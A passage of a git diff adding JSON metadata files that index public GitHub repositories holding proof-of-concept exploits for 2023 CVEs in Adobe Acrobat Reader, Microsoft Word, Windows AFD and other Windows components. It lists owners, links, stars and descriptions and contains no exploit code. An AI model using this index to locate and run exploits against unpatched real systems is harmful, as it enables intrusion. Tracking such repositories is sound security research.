"uefi", + "vulnerability", + "windows-boot", + "writeup" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21608.json b/2023/CVE-2023-21608.json new file mode 100644 index 0000000000..1260a91f49 --- /dev/null +++ b/2023/CVE-2023-21608.json @@ -0,0 +1,83 @@ +[ + { + "id": 595125010, + "name": "CVE-2023-21608", + "full_name": "hacksysteam\/CVE-2023-21608", + "owner": { + "login": "hacksysteam", + "id": 4098538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4", + "html_url": "https:\/\/github.com\/hacksysteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2023-21608", + "description": "Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit", + "fork": false, + "created_at": "2023-01-30T12:57:48Z", + "updated_at": "2024-11-27T11:57:47Z", + "pushed_at": "2023-12-05T12:21:02Z", + "stargazers_count": 268, + "watchers_count": 268, + "has_discussions": false, + "forks_count": 57, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "adobe-reader", + "aslr-bypass", + "cfg-bypass", + "cve-2023-21608", + "dep-bypass", + "exploit", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 57, + "watchers": 268, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 600993696, + "name": "CVE-2023-21608", + "full_name": "Malwareman007\/CVE-2023-21608", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-21608", + "description": "Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit", + "fork": false, + "created_at": "2023-02-13T06:11:40Z", + "updated_at": "2023-11-09T09:44:56Z", + "pushed_at": "2023-02-13T09:03:19Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adobe", + "adobe-reader", + "aslr-bypass", + "cfg-bypass", + "cve-2023-21608", + "dep-bypass", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2163.json b/2023/CVE-2023-2163.json new file mode 100644 index 0000000000..911c6dfea2 --- /dev/null +++ b/2023/CVE-2023-2163.json @@ -0,0 +1,33 @@ +[ + { + "id": 895141993, + "name": "CVE-2023-2163", + "full_name": "letsr00t\/CVE-2023-2163", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2023-2163", + "description": null, + "fork": false, + "created_at": "2024-11-27T16:25:48Z", + "updated_at": "2024-11-27T16:26:40Z", + "pushed_at": "2024-11-27T16:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21674.json b/2023/CVE-2023-21674.json new file mode 100644 index 0000000000..559fa10c88 --- /dev/null +++ b/2023/CVE-2023-21674.json @@ -0,0 +1,33 @@ +[ + { + "id": 768456651, + "name": "CVE-2023-21674", + "full_name": "hd3s5aa\/CVE-2023-21674", + "owner": { + "login": "hd3s5aa", + "id": 160862061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160862061?v=4", + "html_url": "https:\/\/github.com\/hd3s5aa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hd3s5aa\/CVE-2023-21674", + "description": null, + "fork": false, + "created_at": "2024-03-07T05:43:48Z", + "updated_at": "2024-11-21T05:26:33Z", + "pushed_at": "2024-04-05T00:05:44Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21707.json b/2023/CVE-2023-21707.json new file mode 100644 index 0000000000..2474690678 --- /dev/null +++ b/2023/CVE-2023-21707.json @@ -0,0 +1,33 @@ +[ + { + "id": 660576520, + "name": "CVE-2023-21707", + "full_name": "N1k0la-T\/CVE-2023-21707", + "owner": { + "login": "N1k0la-T", + "id": 72502573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72502573?v=4", + "html_url": "https:\/\/github.com\/N1k0la-T", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1k0la-T\/CVE-2023-21707", + "description": "CVE-2023-21707 EXP", + "fork": false, + "created_at": "2023-06-30T10:15:07Z", + "updated_at": "2024-08-25T15:38:45Z", + "pushed_at": "2023-07-06T07:43:24Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21716.json b/2023/CVE-2023-21716.json new file mode 100644 index 0000000000..8f3b9abb84 --- /dev/null +++ b/2023/CVE-2023-21716.json @@ -0,0 +1,350 @@ +[ + { + "id": 610690231, + "name": "CVE-2023-21716", + "full_name": "FeatherStark\/CVE-2023-21716", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2023-21716", + "description": null, + "fork": false, + "created_at": "2023-03-07T09:34:12Z", + "updated_at": "2024-06-20T18:43:22Z", + "pushed_at": "2023-03-07T09:35:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 610826985, + "name": "CVE-2023-21716", + "full_name": "Xnuvers007\/CVE-2023-21716", + "owner": { + "login": "Xnuvers007", + "id": 62522733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62522733?v=4", + "html_url": "https:\/\/github.com\/Xnuvers007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xnuvers007\/CVE-2023-21716", + "description": "RTF Crash POC Python 3.11 Windows 10", + "fork": false, + "created_at": "2023-03-07T15:03:43Z", + "updated_at": "2024-09-03T19:57:00Z", + "pushed_at": "2023-03-07T15:17:47Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 48, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 611115173, + "name": "CVE-2023-21716", + "full_name": "gyaansastra\/CVE-2023-21716", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2023-21716", + "description": "A vulnerability within Microsoft Office's wwlib allows attackers to achieve remote code execution with the privileges of the victim that opens a malicious RTF document. The attacker could deliver this file as an email attachment (or other means).", + "fork": false, + "created_at": "2023-03-08T06:20:45Z", + "updated_at": "2024-09-08T05:45:03Z", + "pushed_at": "2023-03-08T06:21:58Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 611392512, + "name": "CVE-2023-21716_YARA_Results", + "full_name": "mikesxrs\/CVE-2023-21716_YARA_Results", + "owner": { + "login": "mikesxrs", + "id": 12898100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12898100?v=4", + "html_url": "https:\/\/github.com\/mikesxrs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mikesxrs\/CVE-2023-21716_YARA_Results", + "description": "Results of retrohunt for files matching YARA rules from https:\/\/github.com\/AmgdGocha\/Detection-Rules\/blob\/main\/CVE-2023-21716.yar", + "fork": false, + "created_at": "2023-03-08T18:25:39Z", + "updated_at": "2024-06-20T18:43:33Z", + "pushed_at": "2023-03-11T00:04:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612019137, + "name": "CVE-2023-21716-POC", + "full_name": "3yujw7njai\/CVE-2023-21716-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-21716-POC", + "description": "Microsoft Word 远程代码执行漏洞", + "fork": false, + "created_at": "2023-03-10T02:46:32Z", + "updated_at": "2024-06-20T18:43:17Z", + "pushed_at": "2023-03-10T02:48:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618503913, + "name": "CVE-2023-21716_exploit", + "full_name": "hv0l\/CVE-2023-21716_exploit", + "owner": { + "login": "hv0l", + "id": 61795418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61795418?v=4", + "html_url": "https:\/\/github.com\/hv0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hv0l\/CVE-2023-21716_exploit", + "description": "test of exploit for CVE-2023-21716", + "fork": false, + "created_at": "2023-03-24T15:58:25Z", + "updated_at": "2024-08-09T20:17:43Z", + "pushed_at": "2023-03-24T16:00:42Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 628735666, + "name": "CVE-2023-21716", + "full_name": "JMousqueton\/CVE-2023-21716", + "owner": { + "login": "JMousqueton", + "id": 4148567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4148567?v=4", + "html_url": "https:\/\/github.com\/JMousqueton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JMousqueton\/CVE-2023-21716", + "description": "POC : CVE-2023-21716 Microsoft Word RTF Font Table Heap Corruption", + "fork": false, + "created_at": "2023-04-16T21:12:29Z", + "updated_at": "2024-09-19T21:32:04Z", + "pushed_at": "2023-04-16T21:16:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 653288165, + "name": "CVE-2023-21716", + "full_name": "Lord-of-the-IoT\/CVE-2023-21716", + "owner": { + "login": "Lord-of-the-IoT", + "id": 109588583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109588583?v=4", + "html_url": "https:\/\/github.com\/Lord-of-the-IoT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lord-of-the-IoT\/CVE-2023-21716", + "description": "python program to exploit CVE-2023-21716", + "fork": false, + "created_at": "2023-06-13T19:04:45Z", + "updated_at": "2023-07-04T08:47:54Z", + "pushed_at": "2023-06-13T19:04:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714215346, + "name": "CVE-2023-21716-EXPLOIT.py", + "full_name": "MojithaR\/CVE-2023-21716-EXPLOIT.py", + "owner": { + "login": "MojithaR", + "id": 127576267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4", + "html_url": "https:\/\/github.com\/MojithaR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-21716-EXPLOIT.py", + "description": "This is an exploit file which is used to check CVE-2021-21716 vulnerability", + "fork": false, + "created_at": "2023-11-04T08:49:14Z", + "updated_at": "2024-08-23T04:10:50Z", + "pushed_at": "2023-11-05T12:23:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858182132, + "name": "CVE-2023-21716-POC", + "full_name": "RonF98\/CVE-2023-21716-POC", + "owner": { + "login": "RonF98", + "id": 181740430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181740430?v=4", + "html_url": "https:\/\/github.com\/RonF98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RonF98\/CVE-2023-21716-POC", + "description": "Proof Of Concept for CVE-2023-21716 Microsoft Word Heap Corruption", + "fork": false, + "created_at": "2024-09-16T13:04:45Z", + "updated_at": "2024-11-25T09:52:09Z", + "pushed_at": "2024-09-23T13:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880750787, + "name": "poc-cve-2023-21716", + "full_name": "n0s3ns33\/poc-cve-2023-21716", + "owner": { + "login": "n0s3ns33", + "id": 186808597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186808597?v=4", + "html_url": "https:\/\/github.com\/n0s3ns33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0s3ns33\/poc-cve-2023-21716", + "description": "POC CVE 2023-21716", + "fork": false, + "created_at": "2024-10-30T09:38:36Z", + "updated_at": "2024-11-28T15:01:34Z", + "pushed_at": "2024-10-30T09:42:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-21716", + "exploit", + "poc", + "poc-cve-2023-21716", + "rce", + "rtf" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21739.json b/2023/CVE-2023-21739.json new file mode 100644 index 0000000000..9e1f78a185 --- /dev/null +++ b/2023/CVE-2023-21739.json @@ -0,0 +1,33 @@ +[ + { + "id": 591426445, + "name": "CVE-2023-21739", + "full_name": "gmh5225\/CVE-2023-21739", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-21739", + "description": "Windows Bluetooth Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-20T18:21:40Z", + "updated_at": "2024-02-08T11:34:33Z", + "pushed_at": "2023-01-18T23:57:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21742.json b/2023/CVE-2023-21742.json new file mode 100644 index 0000000000..24d812ef79 --- /dev/null +++ b/2023/CVE-2023-21742.json @@ -0,0 +1,33 @@ +[ + { + "id": 625051221, + "name": "CVE-2023-21742", + "full_name": "ohnonoyesyes\/CVE-2023-21742", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-21742", + "description": "CVE-2023-21742 Poc", + "fork": false, + "created_at": "2023-04-07T23:46:25Z", + "updated_at": "2023-09-08T01:17:10Z", + "pushed_at": "2023-04-07T23:49:58Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21746.json b/2023/CVE-2023-21746.json new file mode 100644 index 0000000000..60e33588e2 --- /dev/null +++ b/2023/CVE-2023-21746.json @@ -0,0 +1,33 @@ +[ + { + "id": 667091173, + "name": "LocalPotato_CVE-2023-21746", + "full_name": "Muhammad-Ali007\/LocalPotato_CVE-2023-21746", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/LocalPotato_CVE-2023-21746", + "description": null, + "fork": false, + "created_at": "2023-07-16T15:57:37Z", + "updated_at": "2024-02-24T07:35:51Z", + "pushed_at": "2023-07-16T16:05:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21752.json b/2023/CVE-2023-21752.json new file mode 100644 index 0000000000..47c8b66520 --- /dev/null +++ b/2023/CVE-2023-21752.json @@ -0,0 +1,64 @@ +[ + { + "id": 587377595, + "name": "CVE-2023-21752", + "full_name": "Wh04m1001\/CVE-2023-21752", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-21752", + "description": null, + "fork": false, + "created_at": "2023-01-10T15:59:26Z", + "updated_at": "2024-11-28T16:01:48Z", + "pushed_at": "2023-01-13T09:01:20Z", + "stargazers_count": 307, + "watchers_count": 307, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 66, + "watchers": 307, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 677068156, + "name": "CVE-2023-21752", + "full_name": "yosef0x01\/CVE-2023-21752", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-21752", + "description": null, + "fork": false, + "created_at": "2023-08-10T16:55:06Z", + "updated_at": "2023-08-10T16:55:07Z", + "pushed_at": "2023-08-23T04:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21766.json b/2023/CVE-2023-21766.json new file mode 100644 index 0000000000..cb6b16c2f2 --- /dev/null +++ b/2023/CVE-2023-21766.json @@ -0,0 +1,33 @@ +[ + { + "id": 660454811, + "name": "cve-2023-21766", + "full_name": "Y3A\/cve-2023-21766", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/cve-2023-21766", + "description": "wof.sys race condition uaf read poc", + "fork": false, + "created_at": "2023-06-30T03:44:01Z", + "updated_at": "2023-06-30T03:44:29Z", + "pushed_at": "2023-06-30T03:44:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21768.json b/2023/CVE-2023-21768.json new file mode 100644 index 0000000000..6e1a06eeb1 --- /dev/null +++ b/2023/CVE-2023-21768.json @@ -0,0 +1,351 @@ +[ + { + "id": 611004357, + "name": "Windows_LPE_AFD_CVE-2023-21768", + "full_name": "chompie1337\/Windows_LPE_AFD_CVE-2023-21768", + "owner": { + "login": "chompie1337", + "id": 56364411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4", + "html_url": "https:\/\/github.com\/chompie1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chompie1337\/Windows_LPE_AFD_CVE-2023-21768", + "description": "LPE exploit for CVE-2023-21768", + "fork": false, + "created_at": "2023-03-07T23:00:27Z", + "updated_at": "2024-11-26T22:22:03Z", + "pushed_at": "2023-07-10T16:35:49Z", + "stargazers_count": 483, + "watchers_count": 483, + "has_discussions": false, + "forks_count": 163, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 163, + "watchers": 483, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 612032133, + "name": "cve-2023-21768-compiled", + "full_name": "cl4ym0re\/cve-2023-21768-compiled", + "owner": { + "login": "cl4ym0re", + "id": 70927349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70927349?v=4", + "html_url": "https:\/\/github.com\/cl4ym0re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cl4ym0re\/cve-2023-21768-compiled", + "description": "cve-2023-21768", + "fork": false, + "created_at": "2023-03-10T03:36:52Z", + "updated_at": "2024-10-24T16:47:31Z", + "pushed_at": "2023-03-10T04:03:04Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612358302, + "name": "nullmap", + "full_name": "SamuelTulach\/nullmap", + "owner": { + "login": "SamuelTulach", + "id": 16323119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16323119?v=4", + "html_url": "https:\/\/github.com\/SamuelTulach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamuelTulach\/nullmap", + "description": "Using CVE-2023-21768 to manual map kernel mode driver ", + "fork": false, + "created_at": "2023-03-10T19:08:28Z", + "updated_at": "2024-11-13T15:57:25Z", + "pushed_at": "2023-03-10T20:16:53Z", + "stargazers_count": 176, + "watchers_count": 176, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-21768", + "driver", + "exploit", + "kernel", + "manual-mapper", + "mapper", + "windows" + ], + "visibility": "public", + "forks": 35, + "watchers": 176, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 613567366, + "name": "CVE-2023-21768", + "full_name": "Malwareman007\/CVE-2023-21768", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-21768", + "description": "Windows_AFD_LPE_CVE-2023-21768", + "fork": false, + "created_at": "2023-03-13T20:32:50Z", + "updated_at": "2024-11-25T10:22:48Z", + "pushed_at": "2023-08-27T10:41:40Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 41, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616747050, + "name": "Windows_AFD_LPE_CVE-2023-21768", + "full_name": "HKxiaoli\/Windows_AFD_LPE_CVE-2023-21768", + "owner": { + "login": "HKxiaoli", + "id": 65068574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65068574?v=4", + "html_url": "https:\/\/github.com\/HKxiaoli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HKxiaoli\/Windows_AFD_LPE_CVE-2023-21768", + "description": "Windows 11 System Permission Elevation", + "fork": false, + "created_at": "2023-03-21T01:58:40Z", + "updated_at": "2024-04-12T17:43:29Z", + "pushed_at": "2023-03-21T06:53:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617339899, + "name": "CVE-2023-21768-POC", + "full_name": "3yujw7njai\/CVE-2023-21768-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-21768-POC", + "description": "CVE-2023-21768 Windows 11 22H2 系统本地提权 POC", + "fork": false, + "created_at": "2023-03-22T07:24:36Z", + "updated_at": "2024-08-29T08:56:50Z", + "pushed_at": "2023-03-22T07:34:53Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623746365, + "name": "CVE-2023-21768", + "full_name": "h1bAna\/CVE-2023-21768", + "owner": { + "login": "h1bAna", + "id": 70074237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074237?v=4", + "html_url": "https:\/\/github.com\/h1bAna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1bAna\/CVE-2023-21768", + "description": null, + "fork": false, + "created_at": "2023-04-05T02:05:17Z", + "updated_at": "2024-08-09T05:15:14Z", + "pushed_at": "2023-04-05T02:07:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630367708, + "name": "CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "full_name": "zoemurmure\/CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "owner": { + "login": "zoemurmure", + "id": 43516782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43516782?v=4", + "html_url": "https:\/\/github.com\/zoemurmure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zoemurmure\/CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "description": null, + "fork": false, + "created_at": "2023-04-20T08:26:42Z", + "updated_at": "2024-09-04T14:08:39Z", + "pushed_at": "2023-04-21T02:17:17Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699311026, + "name": "Recreate-cve-2023-21768", + "full_name": "Rosayxy\/Recreate-cve-2023-21768", + "owner": { + "login": "Rosayxy", + "id": 130039321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130039321?v=4", + "html_url": "https:\/\/github.com\/Rosayxy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rosayxy\/Recreate-cve-2023-21768", + "description": "recreating exp for cve-2023-21768.", + "fork": false, + "created_at": "2023-10-02T11:36:49Z", + "updated_at": "2023-10-02T13:58:53Z", + "pushed_at": "2023-10-02T12:06:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 